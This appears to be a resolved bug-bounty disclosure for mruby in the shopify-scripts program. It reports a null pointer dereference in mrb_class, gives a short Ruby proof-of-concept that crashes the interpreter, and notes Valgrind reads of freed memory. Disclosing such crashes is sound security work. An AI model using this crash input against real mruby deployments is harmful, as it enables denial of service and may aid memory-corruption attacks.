Null pointer dereference in mrb_class
Low
S
shopify-scripts
Submitted None
Actions:
Reported by
dgaletic
Vulnerability Details
Technical details and impact analysis
PoC
===
The following demonstrates a crash:
if def class
A
ensure
e rescue 0
end
end
[].map.a
Debug info
==========
The crash happens due to a null pointer dereference in `mrb_class`, class.h:50.
50├> return mrb_obj_ptr(v)->c;
Valgrind shows several reads inside free'd blocks.
Test platform
=============
* Linux Mint 17.3 (Cinnamon 64-bit), built with gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3
mruby SHA: 051e40c0493f2de332f5439e3230c9fe6958bf1a
Thank you,
Dinko Galetic
Denis Kasak
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$800.00
Submitted
Weakness
NULL Pointer Dereference